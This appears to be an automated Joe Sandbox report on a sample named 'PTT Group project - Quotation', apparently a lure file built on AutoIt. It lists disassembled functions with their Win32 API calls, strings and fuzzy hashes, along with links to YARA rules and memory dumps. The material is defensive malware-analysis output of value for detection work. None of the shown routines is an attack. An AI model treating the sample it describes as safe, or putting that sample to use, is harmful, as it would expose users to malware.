Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 124d3164c03cccd14461ebdc3741ce1a93a1b700b0155f051d1087bdc9c68fbd
Instruction ID: f640bcebf24cf857769a45646db7ccf816a14ca2ff28b0cfdd343a2b588090c0
Opcode Fuzzy Hash: 124d3164c03cccd14461ebdc3741ce1a93a1b700b0155f051d1087bdc9c68fbd
Instruction Fuzzy Hash: 7BE17170905219ABDF209F68CC84EEF7BBDFF06714F10815AF9159A290DB748A85DF60

Function 00994B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00994C51
GetDesktopWindow.USER32 ref: 00994C66
GetWindowRect.USER32(00000000), ref: 00994C6D
GetWindowLongW.USER32(?,000000F0), ref: 00994CCF
DestroyWindow.USER32(?), ref: 00994CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00994D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00994D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00994D68
SendMessageW.USER32(?,00000421,?,?), ref: 00994D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00994D90
IsWindowVisible.USER32(?), ref: 00994DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00994DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00994DDF
GetWindowRect.USER32(?,?), ref: 00994DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00994E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00994E37
CopyRect.USER32(?,?), ref: 00994E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00994EB9

Strings

tooltips_class32, xrefs: 00994D1D
(, xrefs: 00994E2A
0, xrefs: 00994BFC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: b42dcbd52715b1a87b5b76cfca5813a87cd919b561fc5e4ece7d24b9e64ad271
Instruction ID: 5ca766e253b994a9ff3f15ba7917cac20095c6cf499ff67e5047cc8a88edda4e
Opcode Fuzzy Hash: b42dcbd52715b1a87b5b76cfca5813a87cd919b561fc5e4ece7d24b9e64ad271
Instruction Fuzzy Hash: AEB18971608341AFDB05DF68C858FAABBE4BF88314F00891DF5999B2A1D771EC45CB92

Function 009127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009128BC
GetSystemMetrics.USER32(00000007), ref: 009128C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009128EF
GetSystemMetrics.USER32(00000008), ref: 009128F7
GetSystemMetrics.USER32(00000004), ref: 0091291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00912939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00912949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0091297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00912990
GetClientRect.USER32(00000000,000000FF), ref: 009129AE
GetStockObject.GDI32(00000011), ref: 009129CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 009129D5

Part of subcall function 00912344: GetCursorPos.USER32(?), ref: 00912357
Part of subcall function 00912344: ScreenToClient.USER32(009D67B0,?), ref: 00912374
Part of subcall function 00912344: GetAsyncKeyState.USER32(00000001), ref: 00912399
Part of subcall function 00912344: GetAsyncKeyState.USER32(00000002), ref: 009123A7

SetTimer.USER32(00000000,00000000,00000028,00911256), ref: 009129FC

Strings

AutoIt v3 GUI, xrefs: 00912974

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: cc3371e33f028e56689836521e235ab5e6f1457b98f123934369e1aa90fde322
Instruction ID: 690a9d140557b51d078fc6a5d620ce7367e257639668502e8105be233c653701
Opcode Fuzzy Hash: cc3371e33f028e56689836521e235ab5e6f1457b98f123934369e1aa90fde322
Instruction Fuzzy Hash: 84B19E71A4420AEFDB14DFA8DC55BEE7BB4FB48314F10812AFA15E7290DB74A890DB50

Function 00994069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009940F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009941B6

Strings

SELECT, xrefs: 00994250
GETSUBITEMCOUNT, xrefs: 00994141
GETSELECTEDCOUNT, xrefs: 00994199
GETSELECTED, xrefs: 009942E4
GETTEXT, xrefs: 0099415F
VIEWCHANGE, xrefs: 00994375
SELECTINVERT, xrefs: 00994286
GETITEMCOUNT, xrefs: 00994128
DESELECT, xrefs: 009942A4
SELECTCLEAR, xrefs: 00994235
SELECTALL, xrefs: 0099421D
ISSELECTED, xrefs: 009941C1
FINDITEM, xrefs: 00994329

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 5c13ddfc71f6178c37f31f29f14c5388d702f702380a410e9da07cd33271a01f
Instruction ID: 0faa1d9306e23e42e9b74e56093c83d8a6cb1a6c98341c6b79ddfafcdd8ee400
Opcode Fuzzy Hash: 5c13ddfc71f6178c37f31f29f14c5388d702f702380a410e9da07cd33271a01f
Instruction Fuzzy Hash: B5A150302143059BCB14EF28C952F6AB3E9BFD4314F14496CB8AA9B6D2DB34EC46CB51

Function 009852F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00985309
LoadCursorW.USER32(00000000,00007F8A), ref: 00985314
LoadCursorW.USER32(00000000,00007F00), ref: 0098531F
LoadCursorW.USER32(00000000,00007F03), ref: 0098532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00985335
LoadCursorW.USER32(00000000,00007F01), ref: 00985340
LoadCursorW.USER32(00000000,00007F81), ref: 0098534B
LoadCursorW.USER32(00000000,00007F88), ref: 00985356
LoadCursorW.USER32(00000000,00007F80), ref: 00985361
LoadCursorW.USER32(00000000,00007F86), ref: 0098536C
LoadCursorW.USER32(00000000,00007F83), ref: 00985377
LoadCursorW.USER32(00000000,00007F85), ref: 00985382
LoadCursorW.USER32(00000000,00007F82), ref: 0098538D
LoadCursorW.USER32(00000000,00007F84), ref: 00985398
LoadCursorW.USER32(00000000,00007F04), ref: 009853A3
LoadCursorW.USER32(00000000,00007F02), ref: 009853AE
GetCursorInfo.USER32(?), ref: 009853BE
GetLastError.KERNEL32(00000001,00000000), ref: 009853E9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 56739526e3620625683631f92ea4668bcc2e69e1043b9d7a7fb70d79d34648ce
Instruction ID: 97c19035d8110c8832aaf0a961eaf5a8543699af7853a968219a86339c71e847
Opcode Fuzzy Hash: 56739526e3620625683631f92ea4668bcc2e69e1043b9d7a7fb70d79d34648ce
Instruction Fuzzy Hash: 0F415370E483196ADB109FBA8C4996EFFB8EF51B50B10452FA509E7290DAB8A401CF51

Function 0096AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0096AAA5
__swprintf.LIBCMT ref: 0096AB46
_wcscmp.LIBCMT ref: 0096AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0096ABAE
_wcscmp.LIBCMT ref: 0096ABEA
GetClassNameW.USER32(?,?,00000400), ref: 0096AC21
GetDlgCtrlID.USER32(?), ref: 0096AC73
GetWindowRect.USER32(?,?), ref: 0096ACA9
GetParent.USER32(?), ref: 0096ACC7
ScreenToClient.USER32(00000000), ref: 0096ACCE
GetClassNameW.USER32(?,?,00000100), ref: 0096AD48
_wcscmp.LIBCMT ref: 0096AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 0096AD82
_wcscmp.LIBCMT ref: 0096AD96

Part of subcall function 0093386C: _iswctype.LIBCMT ref: 00933874

Strings

%s%u, xrefs: 0096AB40

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: f2ac035730f817eb51722e5355a268d615af78718987564dd2c680dc692b9fc9
Instruction ID: 7b0c85ef1e84058e39f927cc3c6eaec4be62f7690dda3b1f5b129d0581feadb3
Opcode Fuzzy Hash: f2ac035730f817eb51722e5355a268d615af78718987564dd2c680dc692b9fc9
Instruction Fuzzy Hash: 54A1B971204306ABD714DF64C894BAAF7ECFF44315F10862AE99AE2190DB34E955CF92

Function 0096B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0096B3DB
_wcscmp.LIBCMT ref: 0096B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0096B414
CharUpperBuffW.USER32(?,00000000), ref: 0096B431
_wcscmp.LIBCMT ref: 0096B44F
_wcsstr.LIBCMT ref: 0096B460
GetClassNameW.USER32(00000018,?,00000400), ref: 0096B498
_wcscmp.LIBCMT ref: 0096B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0096B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 0096B518
_wcscmp.LIBCMT ref: 0096B528
GetClassNameW.USER32(00000010,?,00000400), ref: 0096B550
GetWindowRect.USER32(00000004,?), ref: 0096B5B9

Strings

ThumbnailClass, xrefs: 0096B4A3, 0096B523
@, xrefs: 0096B3BC

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 2abbf39b4d3aafc05d23e30445ee7cec6cae02f249d83aa019f181c1a9dc83c8
Instruction ID: 756df8723991f08dc99752a350c6add22a1df0b84f1a098f95b1467b829fbdb3
Opcode Fuzzy Hash: 2abbf39b4d3aafc05d23e30445ee7cec6cae02f249d83aa019f181c1a9dc83c8
Instruction Fuzzy Hash: 5881A0711083099BDB14DF14C885FAABBECEF84354F04856AFD86DA0A2EB34DD85CB61

Function 0096B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0096B23F

Strings

[ACTIVE, xrefs: 0096B22C
[LAST, xrefs: 0096B2EC
[CLASS:, xrefs: 0096B28F
LAST, xrefs: 0096B204
HANDLE=, xrefs: 0096B238
[ALL, xrefs: 0096B2E5
REGEXP=, xrefs: 0096B254
[HANDLE:, xrefs: 0096B24B
[REGEXPTITLE:, xrefs: 0096B267
ALL, xrefs: 0096B2D3
ACTIVE, xrefs: 0096B21A
CLASSNAME=, xrefs: 0096B27C

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: d3b0b1dec32889b4723bb980d9e8b54044954d8c4bdd59c6fdcbe793bce9d03a
Instruction ID: d4b8f8fb74fe503dcb85228a4e252f099c79303ea713f45193a362a041cc580a
Opcode Fuzzy Hash: d3b0b1dec32889b4723bb980d9e8b54044954d8c4bdd59c6fdcbe793bce9d03a
Instruction Fuzzy Hash: AB316331A4820AA6DB14FBA0CD57FEEB7B89FA4754F600429F451B10D2FF616E84C952

Function 0096C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0096C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0096C4E6
SetWindowTextW.USER32(?,?), ref: 0096C4FD
GetDlgItem.USER32(?,000003EA), ref: 0096C512
SetWindowTextW.USER32(00000000,?), ref: 0096C518
GetDlgItem.USER32(?,000003E9), ref: 0096C528
SetWindowTextW.USER32(00000000,?), ref: 0096C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0096C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0096C569
GetWindowRect.USER32(?,?), ref: 0096C572
SetWindowTextW.USER32(?,?), ref: 0096C5DD
GetDesktopWindow.USER32 ref: 0096C5E3
GetWindowRect.USER32(00000000), ref: 0096C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0096C636
GetClientRect.USER32(?,?), ref: 0096C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0096C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0096C693

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: c5beb39547054bbcb8461ad77474762d394c29d203ef722dd28f8ed14f57a560
Instruction ID: 132f56191007e3c8351358a6fe10a0d6bc2fed45d262b2992e6c5e3c7ce6842f
Opcode Fuzzy Hash: c5beb39547054bbcb8461ad77474762d394c29d203ef722dd28f8ed14f57a560
Instruction Fuzzy Hash: 82518D71904709AFDB20DFA8CE85B7EBBF9FF04705F004929F682A25A0C774A944DB50

Function 0099A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0099A4C8
DestroyWindow.USER32(?,?), ref: 0099A542

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0099A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0099A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0099A5F1
DestroyWindow.USER32(00000000), ref: 0099A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00910000,00000000), ref: 0099A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0099A663
GetDesktopWindow.USER32 ref: 0099A67C
GetWindowRect.USER32(00000000), ref: 0099A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0099A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0099A6B3

Part of subcall function 009125DB: GetWindowLongW.USER32(?,000000EB), ref: 009125EC

Strings

tooltips_class32, xrefs: 0099A5B5, 0099A643
0, xrefs: 0099A4DE

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 1501e8ee0f943abaadd09edb3e20c9c7267159b3445ca5feb571f99cf283f107
Instruction ID: a94e13c6b123c0d3350a45ce7abe6d19001826694cc5647b6b037aa22fa3c69d
Opcode Fuzzy Hash: 1501e8ee0f943abaadd09edb3e20c9c7267159b3445ca5feb571f99cf283f107
Instruction Fuzzy Hash: B3718D71158309AFDB20CF28CC45FAA77E9FB88304F08452DF985872A0D774E945DB56

Function 0099C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00912612: GetWindowLongW.USER32(?,000000EB), ref: 00912623

DragQueryPoint.SHELL32(?,?), ref: 0099C917

Part of subcall function 0099ADF1: ClientToScreen.USER32(?,?), ref: 0099AE1A
Part of subcall function 0099ADF1: GetWindowRect.USER32(?,?), ref: 0099AE90
Part of subcall function 0099ADF1: PtInRect.USER32(?,?,0099C304), ref: 0099AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 0099C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0099C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0099C9AE
_wcscat.LIBCMT ref: 0099C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0099C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 0099CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 0099CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 0099CA47
DragFinish.SHELL32(?), ref: 0099CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0099CB41

Strings

@GUI_DRAGFILE, xrefs: 0099CAF0
@GUI_DROPID, xrefs: 0099CA6E
@GUI_DRAGID, xrefs: 0099CAB9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 99b15ac5fde8b11e14bc908210176d3b97fd4379f9d79c5d560f13d8ebb59626
Instruction ID: 9dc3bfc9ab6d12545744b959a8bd00a20cfcf8c42a36f39062f75a87dbfed6b8
Opcode Fuzzy Hash: 99b15ac5fde8b11e14bc908210176d3b97fd4379f9d79c5d560f13d8ebb59626
Instruction Fuzzy Hash: 40617A71208305AFD701EF68CC95E9FBBE8EFC9714F00092EF592921A1DB309A49CB52

Function 00994619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009946AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009946F6

Strings

SELECT, xrefs: 009948A7
GETITEMCOUNT, xrefs: 009947D8
EXPAND, xrefs: 009947A8
CHECK, xrefs: 00994716
COLLAPSE, xrefs: 0099473C
ISCHECKED, xrefs: 00994879
GETTOTALCOUNT, xrefs: 009946DD
GETSELECTED, xrefs: 00994806
GETTEXT, xrefs: 00994849
UNCHECK, xrefs: 009948D2
EXISTS, xrefs: 0099475F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 8eb5973040a00d54bed913e071df0ac833b45e252874c3ae0cc12529427ab34f
Instruction ID: db11050abc635ce830747cc689170356347a9efdc84d0721933f8eaec2600262
Opcode Fuzzy Hash: 8eb5973040a00d54bed913e071df0ac833b45e252874c3ae0cc12529427ab34f
Instruction Fuzzy Hash: F89149746043059BCB15EF28C461FAAB7E5AF85314F04485DF8965B3A2CB35ED4ACB82

Function 0099BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0099BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00996D80,?), ref: 0099BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0099BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0099BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0099BC7D
FreeLibrary.KERNEL32(?), ref: 0099BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0099BC99
DestroyIcon.USER32(?), ref: 0099BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0099BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0099BCD1

Part of subcall function 0093313D: __wcsicmp_l.LIBCMT ref: 009331C6

Strings

.exe, xrefs: 0099BB04
.dll, xrefs: 0099BB27
.icl, xrefs: 0099BAE4

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: fa16bff2baf037f3c31453ca47c9ce99f8a343844e53c8dd6c26d4be53b2368a
Instruction ID: 8067f1ba336a98e23d299225deb2aa9522cfe6abc703f44323c42e19fb5e8cf5
Opcode Fuzzy Hash: fa16bff2baf037f3c31453ca47c9ce99f8a343844e53c8dd6c26d4be53b2368a
Instruction Fuzzy Hash: 0861E371600219BAEF14DF68DD86FBE77ACEB08711F10411AF915D61C0EB789990DBA0

